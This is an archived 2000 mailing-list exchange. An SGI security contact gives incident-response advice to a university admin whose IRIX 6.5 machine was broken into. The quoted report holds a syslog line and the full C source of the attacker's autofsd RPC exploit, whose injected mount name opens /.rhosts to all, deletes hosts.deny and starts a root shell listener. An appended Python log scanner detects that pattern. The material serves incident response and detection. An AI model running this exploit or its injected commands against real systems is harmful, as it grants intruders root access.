Re: Hacker doesn't take a break IRIS 6.5.0

From: Alexander Icasiano (alexi@sgi.com)
Date: Wed Jan 05 2000 - 12:59:36 PST


Hello,

If there has been a security breach on your SGI system, it will be in
your best interest to follow your site's security policy and contact your
site's security response team. (Most computer security response teams are
listed on http://www.first.org/). Your security team will probably
contact local law enforcement authorities, including the police and FBI,
and report this incident to CERT (http://www.cert.org/) for coordination
to see if there are other similar attacks at other sites. SGI will
coordinate with CERT and assist law enforcement while they investigate any
crime. Make sure you get copies of the police report for insurance claims
(loss of business, theft of property, etc.).

SGI recommends that the system be unplugged from the network and full
verified backups be performed of the system and all disks. Law
enforcement may want copies of the backups and hard copy printouts of the
logs to be used for the investigation and possibly as evidence in a court
of law. After the backups have been verified, then all disks should be
wiped to remove any trojans or backdoors from the system. The system
should be reloaded with the current recommended/required
(http://support.sgi.com/ or ftp://patches.sgi.com/) and security patchsets
(http://www.sgi.com/Support/security/ or ftp://sgigate.sgi.com/patches/).
Before the system is placed back on the network, it should be secured
according to your local site security policy.

Information on how to back up, secure and audit your machine can be found
in the IRIX Advanced Site and Server Administration guide online in
InSight or on the web:
http://techpubs.sgi.com/library/tpl/cgi-bin/browse.cgi?coll=0650&db=bks&cmd=toc&pth=/SGI_Admin/IA_BakSecAcc

Since there is a high probability that the hackers have installed
backdoors and trojan horse programs, you cannot trust basic Unix commands
on the compromised system like ls, ps, su, etc., so the machine must be
backed up and wiped, then reloaded with a fresh install of the operating
system in order to bring the system to a known state. When recovering from
backups, only restore data. No binaries, libraries, or executables, since
there might be trojans or backdoors.

I am not sure what your site security policy states, but most of the
secure customer sites I work with have a site security policy that states
that NFS is disabled on untrusted networks, which includes autofsd/automountd. NFS
can be spoofed because it assumes a trusted network. Too much of the
authentication and control channels are in cleartext, similar to telnet,
ftp, or the r-commands like rlogin, rsh, etc. NFS uses RPC, which assumes
host-based authentication by IP address, which is considered a weak form of
authentication. Many secure sites move to alternative file sharing
protocols which are considered more secure on untrusted networks, like AFS,
etc., but it depends on your site security policy.

We are investigating the autofsd security issue. For now it is best to
assume autofsd is vulnerable and follow your site security policy, which may
dictate that you disable the service or switch to automountd, or switch to
another file sharing protocol, or even place the service behind a firewall
to form a trusted network.

Alex

On Dec 31, 3:04pm, Yiu-Fai Lam wrote:
> Subject: Hacker doesn't take a break IRIS 6.5.0
> Dear Folks,
> ATTENTION:
>
> Sorry to find out during the Christmas break that a hacker broke into my
> system, running IRIS 6.5.0.
> Apparently, a .rhosts file was created with "+ +" and new user accounts
> were set up with no passwords and with the power of root.
> The SYSLOG shows that once the rhosts was created, the hackers entered
> via the illegal accounts and installed an unknown number of sniff
> programs on my system disks.
> They created folders afs_iris and nn, in which there are sniff programs
> to spring to other sites.
>
>
> The following attachment gives you some trace of what they did.
> While I am trying to get more expert help, please let me know if you
> have any comment or experienced similar attacks during the same period of
> time.
> Appreciate any help you are willing to share.
>
> Well, what a way to spend New Year's Eve before the Y2K!
>
> Sincerely,
> Yiu-fai Lam
>
> ====================================
> Dec 26 03:26:33 xyz autofsd[196]: mount of /hosts/;echo '+ +' >
> /.rhosts;rm -rf /etc/hosts.deny; echo "courier stream tcp nowait root
> /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob failed
>
>
>
> Dec 28 18:20:53 6E:xyz login[40100]: ?@ts025d40.sto-ca.concentric.net as
> whatever
>
>
> Dec 31 01:18:53 6E:xyz login[45746]:
> ?@178.phoenix-18-19rs.az.dial-access.att.net as whatever
>
>
> Dec 31 01:22:39 6E:xyz login[37947]:
> ?@178.phoenix-18-19rs.az.dial-access.att.net as whatever
> =========================================================================
>
> Hacker installed a sniffer as afs-irix
>
> total 248
> 40 -rwxr-xr-x 1 root sys 18260 Dec 29 00:26 aa
> 40 -rwxr-xr-x 1 root sys 18668 Dec 29 00:19 amd
> 8 -rw-r--r-- 1 root sys 2759 Dec 29 00:19 autofs.c
> 152 -rw-r--r-- 1 root sys 74952 Dec 31 11:44 core
> 8 -rw-r--r-- 1 root sys 1433 Dec 31 11:44 jig
> 0 -rw------- 1 root sys 0 Dec 31 01:20 nohup.out
> ===========================================================
>
> # more autofs.c
> #include <sys/types.h>
> #include <sys/time.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <stdio.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <stdlib.h>
> #include <errno.h>
> #include <string.h>
> #include <netdb.h>
> #include <rpc/rpc.h>
> #include <rpc/xdr.h>
> #include <signal.h>
>
> #define AUTOFS_PROG ((u_long)100099)
> #define AUTOFS_VERS ((u_long)1)
> #define AUTOFS_MOUNT ((u_long)1)
>
> #define AT 8
> #define A_MAXNAME 255
> #define A_MAXOPTS 255
> #define A_MAXPATH 1024
>
> struct mntrequest {
> char *name; /* name to be looked up */
> char *map; /* map to use */
> char *opts; /* default options */
> char *path; /* mountpoint to use */
> };
>
> struct mntres {
> int status; /* 0=OK, otherwise an errno from <sys/errno.h>
> */
> };
>
> bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp){
> if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
> if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE);
> if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
> if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
> return (TRUE);
> }
> void signal_handler(void) {
> exit(0);
> }
> bool_t xdr_mntres(XDR *xdrs,struct mntres *objp){
> if (!xdr_int(xdrs, &objp->status)) return (FALSE);
> return (TRUE);
> }
>
> main(int argc, char **argv){
>
> CLIENT *cl;
> struct mntrequest mntreq;
> struct mntres *res;
> struct sockaddr_in target;
> struct hostent *hp;
> struct timeval tm;
> char *host;
> enum clnt_stat stat;
> FILE *jackfrost;
>
>
> int sd;
>
> signal(SIGALRM, signal_handler);
>
> alarm(AT);
> host=argv[1];
>
> if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
> if ((hp = gethostbyname(host)) == NULL) {
> printf("%s: cannot resolve\n", host);
> exit(1);
> } else
> target.sin_addr.s_addr = *(u_long *)hp->h_addr;
> }
> target.sin_family=AF_INET;
> target.sin_port=0;
>
> sd=RPC_ANYSOCK;
> tm.tv_sec=8;
>
> tm.tv_usec=0;
> if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL)
> {
> clnt_pcreateerror("clnt_create");
> exit(0);
> }
> cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
> tm.tv_sec = 25;
>
> mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo
> \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd
> /tmp/bob";
> mntreq.map="/bin/true";
> mntreq.path="/hosts";
> mntreq.opts="";
> bzero((char *)&res, sizeof(res));
>
> if ((stat = clnt_call(cl, AUTOFS_MOUNT,
> (xdrproc_t)xdr_mntrequest,&mntreq,
> (xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) {
> clnt_perror(cl, "clnt_call");
> exit(1);
> }
>
> jackfrost = fopen("jig", "a");
> if ( (int)jackfrost > 0 ) {
> fprintf(jackfrost, "%s\n", argv[1]);
> fclose(jackfrost);
> }
> clnt_destroy(cl);
> }
>
> ===================================================
>
>
> --
> Yiu-fai Lam
> NMR Lab. University of Maryland, Bldg #91
> Chemistry & Biochemistry Department, College Park, MD 20742.
> Phone: 301-405-1869 (Voice-mail), Labs: 405-1870 or 405-8559
> Fax : 301-314-9121 E-mail: YL2@UMAIL.UMD.EDU
> WEB: http://oxynmr.umd.edu
>
>-- End of excerpt from Yiu-Fai Lam

-- 
- Alex Icasiano alexi@sgi.com PGP Key @ http://reality.sgi.com/alexi -
----------------------------------------------------------------------
Random Fortune:

"Life is like a buffet; it's not good but there's plenty of it."
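Added example, not from either mail: a small Python scanner over constructed syslog lines modelled on the excerpt Lam posted. It flags autofsd mount requests whose lookup key carries shell metacharacters (the pattern in the Dec 26 line) and login records whose remote-user field is `?` (the pattern in the Dec 28 and Dec 31 lines); treating that `?` as "originating user could not be identified" is an assumption, not something either mail states.

```python
import re

# Constructed sample lines, modelled on the syslog excerpt in the post: the
# autofsd line is Lam's reflowed onto one line, the concentric.net login line
# is also from the post, the other two are invented benign noise.
SAMPLE_SYSLOG = [
    "Dec 26 03:26:33 xyz autofsd[196]: mount of /hosts/;echo '+ +' > /.rhosts;"
    "rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\""
    " > /tmp/bob;inetd /tmp/bob failed",
    "Dec 26 03:30:01 xyz autofsd[196]: mount of /hosts/fileserver1 failed",
    "Dec 28 18:20:53 6E:xyz login[40100]: ?@ts025d40.sto-ca.concentric.net as whatever",
    "Dec 28 19:00:00 6E:xyz login[40101]: alice@ws12.example.org as alice",
]

AUTOFSD_RE = re.compile(r"autofsd\[\d+\]: mount of (?P<path>.*) failed$")
LOGIN_RE = re.compile(
    r"login\[\d+\]: (?P<user>[^@ ]+)@(?P<host>\S+) as (?P<account>\S+)$")
# A legitimate automount key is a path component; any of these characters in
# the key means the request carried shell syntax, as in the line Lam posted.
SHELL_META = ";|&`$<>"


def scan_syslog(lines):
    # Returns one dict per suspicious line; benign lines produce nothing.
    findings = []
    for line in lines:
        m = AUTOFSD_RE.search(line)
        if m:
            path = m.group("path")
            meta = sorted(set(c for c in path if c in SHELL_META))
            if meta:
                findings.append({"type": "autofsd-injection", "path": path,
                                 "metachars": meta, "line": line})
            continue
        m = LOGIN_RE.search(line)
        # Assumption: '?' in the remote-user field (as in Lam's lines) marks a
        # login whose originating user could not be identified; flag it.
        if m and m.group("user") == "?":
            findings.append({"type": "unidentified-remote-login",
                             "host": m.group("host"),
                             "account": m.group("account"), "line": line})
    return findings


if __name__ == "__main__":
    for f in scan_syslog(SAMPLE_SYSLOG):
        print(f["type"], f.get("path") or f.get("host"))
```

Run it against real /var/adm/SYSLOG lines from a copy of the logs, not from the compromised host's own tools, consistent with the advice above about not trusting binaries on the box.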



This archive was generated by hypermail 2b29 : Sun Dec 31 2000 - 01:15:01 PST